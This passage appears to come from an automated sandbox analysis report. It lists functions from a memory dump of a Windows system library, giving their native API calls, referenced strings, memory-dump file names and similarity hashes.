Opcode Fuzzy Hash: c84c421984ed69f76353bc1cba507ea97173edbf0c8740374001e59a50977ae4
Instruction Fuzzy Hash: A0418AB0A04A88CFDB24CF99C69479DFBF5EF44314F10802ED05A9B641EF709A45DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6ABE3884, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95memorynativeCOMMON

Download Yara Rule

APIs

ZwQueryValueKey.1105(?,00000000,00000002,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6ABE38BF
RtlAllocateHeap.1105(?,00000008,?,?,00000000,00000002,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6ABE38E5
ZwQueryValueKey.1105(00000000,00000000,00000002,00000000,?,?,00000008,?,?,00000000,00000002,00000000,00000000,?,?,00000000), ref: 6ABE3906
RtlFreeHeap.1105(?,00000000,00000000,?,00000000,00000002,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6ABE3961

Strings

BinaryName, xrefs: 6ABE38B4

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapQueryValue$AllocateFree
String ID: BinaryName
API String ID: 4267586637-215506332
Opcode ID: 7d5b53e104057b13c5c278377cc961f3551e48e4bdcbe22c0d8543fe7e7420ec
Instruction ID: f4ef6c7ec5780fc3c56333be50973e837afb3bb6817b3375089a366f498ee83c
Opcode Fuzzy Hash: 7d5b53e104057b13c5c278377cc961f3551e48e4bdcbe22c0d8543fe7e7420ec
Instruction Fuzzy Hash: FA31F17AD0599ABFDB15CA58C945E6FF774FF80B60F024169E815A72A0DB309E00E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB9D294, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93memorynativefileCOMMON

Download Yara Rule

APIs

ZwQueryAttributesFile.1105(?,?,?,?), ref: 6AB9D313
RtlFreeHeap.1105(?,00000000,?,?,?,?,?), ref: 6AB9D330
ZwClose.1105(00000000,?,?,?,?), ref: 6ABDB001
RtlFreeHeap.1105(?,00000000,?,00000000,?,?,?,?), ref: 6ABDB011

Strings

@, xrefs: 6AB9D303

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$AttributesCloseFileQuery
String ID: @
API String ID: 2866988855-2766056989
Opcode ID: a49f10eb184766148d0e09c864e7634dc420625733532161dd09253c487f10c7
Instruction ID: fab68896fda482a3386885d58f307716171aaeef0c6df909b07bb8509f9c0ec4
Opcode Fuzzy Hash: a49f10eb184766148d0e09c864e7634dc420625733532161dd09253c487f10c7
Instruction Fuzzy Hash: 72317AB154D385AFC351CF2AD980A5BBFE8FB86754F01092EF99483211DA34DD04EB92

Uniqueness

Uniqueness Score: -1.00%

Function 6ABEEA20, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.1105(6AC570A0,-00000054,?,00000000,-00000054,?,6ABC5D18), ref: 6ABEEA52
DbgPrint.1105(AVRF: AVrfDllUnloadNotification called for a provider (%p) ,-00000054,6AC570A0,-00000054,?,00000000,-00000054,?,6ABC5D18), ref: 6ABEEA69
RtlLeaveCriticalSection.1105(6AC570A0,6AC570A0,-00000054,?,00000000,-00000054,?,6ABC5D18), ref: 6ABEEAB0

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 6ABEEA64

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeavePrint
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 1203512206-702105204
Opcode ID: b3e8036244bffc7869f675a8f050509fb1eecc0478052fac17436ad902ad509c
Instruction ID: 967e5857b74b349c183c4bb09486b44b1a0f5978a6ae78e9b485ca89e3680730
Opcode Fuzzy Hash: b3e8036244bffc7869f675a8f050509fb1eecc0478052fac17436ad902ad509c
Instruction Fuzzy Hash: 3B11E0312012C8BBDA209E24DC88A5FBBF5FF86298F02151DF50557552DF21AC60F790

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8B944, Relevance: 7.7, APIs: 5, Instructions: 166nativetimeCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT(00000000,?,00002710,00000000,?,?,?), ref: 6AB8B9A5
RtlGetCurrentServiceSessionId.1105(00000000,?,00002710,00000000,?,?,?), ref: 6AB8BA9C
ZwSetTimer2.1105(00000000,?,00000000,?,00000000,?,00002710,00000000,?,?,?), ref: 6AB8BAC6
RtlGetCurrentServiceSessionId.1105(?,?,?), ref: 6AB8BAE9
ZwCancelTimer2.1105(00000000,00000000,?,?,?), ref: 6AB8BB03

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentServiceSessionTimer2$CancelUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1220516486-0
Opcode ID: 32a3c02b041d3790390050832d5af2d773f2550830d5d9ca0b1390601be867fb
Instruction ID: f2eba66d4af677715f2f814d113fbbbfef4daa47198f520f1936bebc1f471615
Opcode Fuzzy Hash: 32a3c02b041d3790390050832d5af2d773f2550830d5d9ca0b1390601be867fb
Instruction Fuzzy Hash: E75131B0A08781DFC720CF2CC080A1EBBF5FB89714F15896EE99597256DB71E844DB92

Uniqueness

Uniqueness Score: -1.00%

Function 6ABB8BE8, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 657COMMON

Download Yara Rule

Strings

(null), xrefs: 6ABB8FFF, 6ABB904C
(null), xrefs: 6ABB914A
', xrefs: 6ABB9129

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print
String ID: '$(null)$(null)
API String ID: 3558298466-1087929977
Opcode ID: 512681dd733450fa3f66d83731206b808908635fca6b1cffdff152f933e9a52f
Instruction ID: 885a32a6543d517e3286fe27a6a867bb54e83faf1033e5a4b5e229e1c59cefa6
Opcode Fuzzy Hash: 512681dd733450fa3f66d83731206b808908635fca6b1cffdff152f933e9a52f
Instruction Fuzzy Hash: 2B32D2B1E002A99ADB348F28CC847F9B7B4EB55314F4181E9D619A7291DF30CAC4EF58

Uniqueness

Uniqueness Score: -1.00%

Function 6AB69100, Relevance: 7.6, APIs: 5, Instructions: 141nativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.1105(?,6AC3F6E8,0000002C,6ABBE530,00000000,?,6AC401C0,00000010,6AC3810C,00000000,00000000,00000000,00000000,6AC586C4,6AC586C4,00000008), ref: 6AB69158
ZwShutdownWorkerFactory.1105(?,?), ref: 6AB69182
RtlGetCurrentServiceSessionId.1105 ref: 6AB691C0

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AcquireCurrentExclusiveFactoryLockServiceSessionShutdownWorker
String ID:
API String ID: 1345183298-0
Opcode ID: 8b2dce65cce1468c3910cbf14d4df00c4a1a4f9c6d185731b9891036419fa221
Instruction ID: 940e7694003749ce899cf3b69785bd0148a0efea4013c379e74b0ff4be7565b8
Opcode Fuzzy Hash: 8b2dce65cce1468c3910cbf14d4df00c4a1a4f9c6d185731b9891036419fa221
Instruction Fuzzy Hash: FC51CCB5A052D4AFCB51CB38C988F9DFBF1AB49714F21521AD425A7242EF309840FB92

Uniqueness

Uniqueness Score: -1.00%

Function 6ABF19C8, Relevance: 7.6, APIs: 5, Instructions: 107nativeCOMMON

Download Yara Rule

APIs

ZwCreateSection.1105(?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 6ABF1A54
ZwMapViewOfSection.1105(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,?,000F0007,?,?,00000004,08000000), ref: 6ABF1A74
memset.1105(?,00000000,000000F0,?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,?,000F0007,?), ref: 6ABF1A88
ZwUnmapViewOfSection.1105(000000FF,?,?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 6ABF1AB8
ZwClose.1105(?,?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 6ABF1AC8

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$View$CloseCreateUnmapmemset
String ID:
API String ID: 788617167-0
Opcode ID: 77c0bd51e630a667eaba0cead26d1e37344295029b98cca860612fa6308b154e
Instruction ID: eeac6a33449fa266eb7640d62036d48bf35b7990f356861a8f8553351b985d69
Opcode Fuzzy Hash: 77c0bd51e630a667eaba0cead26d1e37344295029b98cca860612fa6308b154e
Instruction Fuzzy Hash: EF31A9B1E01289BBDB10CF99D840E9EFBF8EF85710F19456AEA10B7350DB714A05DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB63880, Relevance: 7.6, APIs: 5, Instructions: 97memorynativeCOMMON

Download Yara Rule

APIs

TpSetWaitEx.1105(000000FF,?,00000000,00000000), ref: 6AB638B7

Part of subcall function 6AB8ECE0: RtlAcquireSRWLockExclusive.1105(?,00000000,00000000), ref: 6AB8ED2C
Part of subcall function 6AB8ECE0: RtlReleaseSRWLockExclusive.1105(?,00000000,00000000,?,00000000,00000000), ref: 6AB8ED90

RtlAllocateHeap.1105(?,00000000,00001030,00000000,?,00000000,00000000,00000000,00001030,000000FF,?,00000000,00000000), ref: 6AB638D1
ZwGetCompleteWnfStateSubscription.1105(00000000,?,00000000,00000000,00000000,00001030,000000FF,?,00000000,00000000), ref: 6AB638F0
RtlFreeHeap.1105(?,00000000,00000000,00000000,?,?,00000000,00000000,00001030,?,00000000,00000000,00000000,00001030,000000FF,?), ref: 6AB63914

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveHeapLock$AcquireAllocateCompleteFreeReleaseStateSubscriptionWait
String ID:
API String ID: 2233382-0
Opcode ID: 2b36ae21825505ae8d3004db1c0b518fb5ec5b11e4753d39cb6c8d1729358222
Instruction ID: 77af1aa3a12e9a96101c178692b604ae335f06cc6cd7c6d81d4303b3cafebd26
Opcode Fuzzy Hash: 2b36ae21825505ae8d3004db1c0b518fb5ec5b11e4753d39cb6c8d1729358222
Instruction Fuzzy Hash: 0C319076E42299BFDB20CEA9C844A9EFBF8EF05350F024565E915E7251DB70DE00AF90

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6A7B0, Relevance: 7.6, APIs: 5, Instructions: 81nativethreadCOMMON

Download Yara Rule

APIs

ZwOpenProcessTokenEx.1105(000000FF,00000002,00000200,?,?,00000000,00800000), ref: 6AB6A813
ZwDuplicateToken.1105(?,?,00000018,00000000,00000002,?,000000FF,00000002,00000200,?,?,00000000,00800000), ref: 6AB6A831
ZwSetInformationThread.1105(000000FE,00000005,?,00000004,?,?,00000018,00000000,00000002,?,000000FF,00000002,00000200,?,?,00000000), ref: 6AB6A846
ZwClose.1105(?,000000FE,00000005,?,00000004,?,?,00000018,00000000,00000002,?,000000FF,00000002,00000200,?), ref: 6AB6A858
ZwClose.1105(?,?,?,00000018,00000000,00000002,?,000000FF,00000002,00000200,?,?,00000000,00800000), ref: 6AB6A860

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseToken$DuplicateInformationOpenProcessThread
String ID:
API String ID: 3308950446-0
Opcode ID: fbf2ca2f82ba0f876238dc78160ddaada64b3e2612be2cf376f99e6851d8e300
Instruction ID: 6eebc130eddd16779b77bb8c16ce2ff8dfc596e19f9698ae0995ecf56381e55a
Opcode Fuzzy Hash: fbf2ca2f82ba0f876238dc78160ddaada64b3e2612be2cf376f99e6851d8e300
Instruction Fuzzy Hash: D5216D71D0165DABEB10CF98C845AEEBBB8EF44720F114129EA10B7281EF319901ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB64A20, Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105 ref: 6AB64A2A
RtlFreeHeap.1105(?,00000000,?), ref: 6AB64AB3

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentFreeHeapServiceSession
String ID:
API String ID: 1159841122-0
Opcode ID: 039c89bc1e7d359140c22de84d528d2678e5767d3c3c418c20110d31241d298e
Instruction ID: 4b3359f245e768e95d349263d8ffecce9edab57abcdb5f33fa10d881a713ac02
Opcode Fuzzy Hash: 039c89bc1e7d359140c22de84d528d2678e5767d3c3c418c20110d31241d298e
Instruction Fuzzy Hash: 4021F671259EC0FFC7719B28CA24F0A37B5EF51724F101629F056465A1EF30A891FB9A

Uniqueness

Uniqueness Score: -1.00%

Function 6AB728AE, Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(00000000,?,6AC584D8,6AB70924,6AC584D8,?,6AC584D8,?,00000000,?,?,?,6AB7087C,?,?,?), ref: 6AB728B3
RtlEnterCriticalSection.1105(6AC55350), ref: 6AB728DA
RtlGetCurrentServiceSessionId.1105(6AC55350), ref: 6AB728E1
RtlGetCurrentServiceSessionId.1105 ref: 6ABC76AF

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentServiceSession$CriticalEnterSection
String ID:
API String ID: 1555030633-0
Opcode ID: 04d7eb3a285e3a0bd26062a682597d19ac94147111518db7d6c981355534c20c
Instruction ID: 5131f96628adccedbae69092503ddd410557db91dc0c292210e5746181f52684
Opcode Fuzzy Hash: 04d7eb3a285e3a0bd26062a682597d19ac94147111518db7d6c981355534c20c
Instruction Fuzzy Hash: 6F2165716466C19BE322476C8D48F143B94EF45778F1607A1E9319B6E3EFE9D880A311

Uniqueness

Uniqueness Score: -1.00%

Function 6AC33E22, Relevance: 7.6, APIs: 5, Instructions: 62nativeCOMMON

Download Yara Rule

APIs

ZwTraceControl.1105(0000001A,6AC55338,00000008,00000000,00000000,?,6AC55338,00000000,6AC55320,6AC55320,6AC55338,?,6AC584E0,?,00000001,6AB45C80), ref: 6AC33E5D
RtlNtStatusToDosError.1105(00000000,0000001A,6AC55338,00000008,00000000,00000000,?,6AC55338,00000000,6AC55320,6AC55320,6AC55338,?,6AC584E0,?,00000001), ref: 6AC33E6B
RtlAcquireSRWLockExclusive.1105(6AC58504,00000000,0000001A,6AC55338,00000008,00000000,00000000,?,6AC55338,00000000,6AC55320,6AC55320,6AC55338,?,6AC584E0), ref: 6AC33E7A
RtlReleaseSRWLockExclusive.1105(6AC58504,6AC58504,00000000,0000001A,6AC55338,00000008,00000000,00000000,?,6AC55338,00000000,6AC55320,6AC55320,6AC55338,?,6AC584E0), ref: 6AC33EA1
RtlSetLastWin32Error.1105(00000006,6AC55338,00000000,6AC55320,6AC55320,6AC55338,?,6AC584E0,?,00000001,6AB45C80,6AB6591B), ref: 6AC33EAC

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorExclusiveLock$AcquireControlLastReleaseStatusTraceWin32
String ID:
API String ID: 1422652320-0
Opcode ID: 4432acbf776db7bb468a2331a5d17acb80e0beae40a0a36093045e08c78704bc
Instruction ID: df58da7bd347a26a32130c9f2a78129bc60606c51cd155cdaac9a6ce412c9cd5
Opcode Fuzzy Hash: 4432acbf776db7bb468a2331a5d17acb80e0beae40a0a36093045e08c78704bc
Instruction Fuzzy Hash: CC110A7660126466CB609F69C884F9FBBB8EF49764F414065EC149B242EF30D90187E0

Uniqueness

Uniqueness Score: -1.00%

Function 6ABE3971, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75nativeCOMMON

Download Yara Rule

APIs

ZwOpenKeyEx.1105(00000000,00020019,?,00000000,?,00000000), ref: 6ABE3A81

Strings

@, xrefs: 6ABE3A6B
\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\AppModel\StateChange, xrefs: 6ABE3990
\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\AppModel\StateChange\PackageList\%ws, xrefs: 6ABE39AC

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Open
String ID: @$\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\AppModel\StateChange$\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\AppModel\StateChange\PackageList\%ws
API String ID: 71445658-842945461
Opcode ID: 2e2c120b69c3ba296bf5f6f40d7edd847c31d012b3bd023b70ef70ad97b7f271
Instruction ID: 432526a60ffcfc93d4ac599bf2b0bf7af1a9b06e2dcc08645dcf52a5775efe5b
Opcode Fuzzy Hash: 2e2c120b69c3ba296bf5f6f40d7edd847c31d012b3bd023b70ef70ad97b7f271
Instruction Fuzzy Hash: 83312B75E0226CAADB24DF549C98ADEFBB8EB08710F1001DAE50DA7201DB349B859F94

Uniqueness

Uniqueness Score: -1.00%

Function 6ABF176C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55nativeCOMMON

Download Yara Rule

APIs

ZwOpenEvent.1105(00000568,00100001,?,?,00000000), ref: 6ABF17B5
ZwWaitForSingleObject.1105(00000568,00000000,?,00000568,00100001,?,?,00000000), ref: 6ABF17E1
ZwClose.1105(00000568,00000568,00000000,?,00000568,00100001,?,?,00000000), ref: 6ABF17EB

Strings

\KernelObjects\SystemErrorPortReady, xrefs: 6ABF178B

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEventObjectOpenSingleWait
String ID: \KernelObjects\SystemErrorPortReady
API String ID: 2739627308-2278496901
Opcode ID: ec8df56c851873cc614b4676c407a3caa0a80c05be9b1c752f80c54889102292
Instruction ID: 8eeb21ebeb1bec82cdfba1f20b99d2c7e99b0af1f5acad5c3e6d82a2f36c4da3
Opcode Fuzzy Hash: ec8df56c851873cc614b4676c407a3caa0a80c05be9b1c752f80c54889102292
Instruction Fuzzy Hash: 5C117371D0025CAACB10CFA99845ADEFBF8EF85610F15416BE914F3250E7714A05DBD5

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6429E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51librarynativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.1105(?,\DllNXOptions,?,?,00000000), ref: 6AB642C7

Part of subcall function 6ABA0F48: ZwOpenKey.1105(?,?,00000018), ref: 6ABA1015

ZwClose.1105(?,?,?,?,\DllNXOptions,?,?,00000000), ref: 6ABC068E
LdrQueryImageFileKeyOption.1105(?,?,00000004,?,00000004,?,?,?,00000000), ref: 6ABC06A6

Strings

\DllNXOptions, xrefs: 6AB642BE

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFileImageInitOpenOptionQueryStringUnicode
String ID: \DllNXOptions
API String ID: 166309601-742623237
Opcode ID: 87e578da7b510a193aab233fcc9666236f5f7833260fc7878d3bee421ad5340e
Instruction ID: 15160031cf27ff4ee3a0b8e38bfccb1123f29b07def6a2e68702356f213ab7a7
Opcode Fuzzy Hash: 87e578da7b510a193aab233fcc9666236f5f7833260fc7878d3bee421ad5340e
Instruction Fuzzy Hash: 3B01D476A01258BBCB10CAA89910D9F77BCEB85324F1100B5EE14EB140EF309E01A7E5

Uniqueness

Uniqueness Score: -1.00%

Function 6AB78800, Relevance: 6.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

APIs

memcmp.1105(6AC584DC,6AB41184,00000010,-00000054,?,00000000,00000001,?,6AC552D8), ref: 6AB788A8
RtlAcquireSRWLockExclusive.1105(6AC586CC,-00000054,?,00000000,00000001,?,6AC552D8), ref: 6AB78901
RtlReleaseSRWLockExclusive.1105(6AC586CC,6AC586CC,-00000054,?,00000000,00000001,?,6AC552D8), ref: 6AB78933
RtlAcquireSRWLockExclusive.1105(6AC586CC,-00000054,?,00000000,00000001,?,6AC552D8), ref: 6ABC9C65

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$Acquire$Releasememcmp
String ID:
API String ID: 2792186644-0
Opcode ID: e617c37c21934454c52ca4b27e47d65d08563f96e50cd6c1181559498cf5e253
Instruction ID: 037df9aa8684936ad2f82af9fa34252d91aa5b005beeba98a29d8d97326f2ba9
Opcode Fuzzy Hash: e617c37c21934454c52ca4b27e47d65d08563f96e50cd6c1181559498cf5e253
Instruction Fuzzy Hash: A051ED71900289DFEF68CF98C4C1AAE7BB5FF45304F164069D825AB151EF70EA81EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6AB61AA0, Relevance: 6.1, APIs: 4, Instructions: 123memorynativeCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.1105(?,00000008,00000000,?,00000000,?,?,00000000,C0000017), ref: 6AB61B1E
ZwAllocateVirtualMemory.1105(000000FF,?,00000000,?,00002000,00000004,00000000,?,?,00000000,C0000017,?,?,6AB616E0), ref: 6AB61B83
ZwAllocateVirtualMemory.1105(000000FF,6AB616E0,00000000,C0000017,00001000,00000004,00000000,?,?,00000000,C0000017,?,?,6AB616E0), ref: 6AB61BBD
RtlAllocateHeap.1105(?,00000008,?,00000000,?,?,00000000,C0000017), ref: 6AB61BD8

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Allocate$HeapMemoryVirtual
String ID:
API String ID: 1343662020-0
Opcode ID: ff884249f956a76cbe8466050f7d8afdfb7191b031ec1569717d03b17d0e24ed
Instruction ID: 25281a8dd137c1b56144307f88956de12bd05109c57232af2fbfab0bebfb6726
Opcode Fuzzy Hash: ff884249f956a76cbe8466050f7d8afdfb7191b031ec1569717d03b17d0e24ed
Instruction Fuzzy Hash: 32418271A04645EFDB24CFA9D980A9EB7F8FF08300F14456DE55AD7650EB31EA04DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6F018, Relevance: 6.1, APIs: 4, Instructions: 95memorynativeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,00000008,?,00000000,?,00000001), ref: 6AB6F05B
ZwQueryValueKey.1105(?,?,00000002,00000000,?,00000000,?,00000008,?,00000000,?,00000001), ref: 6AB6F07A
memcpy.1105(00000000,0000000C,?,?,?,00000002,00000000,?,00000000,?,00000008,?,00000000,?,00000001), ref: 6AB6F0AB
RtlFreeHeap.1105(?,00000000,00000000,?,?,00000002,00000000,?,00000000,?,00000008,?,00000000,?,00000001), ref: 6AB6F0CB

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateFreeQueryValuememcpy
String ID:
API String ID: 125101864-0
Opcode ID: f6b9efe4b52a4856d400988c6c8340c43cb80f0ce6ef2e524c0764acaf3af869
Instruction ID: 9c7856b44425fde2266e964d10485a7cced7f7f40df2fce25a182bb33366472f
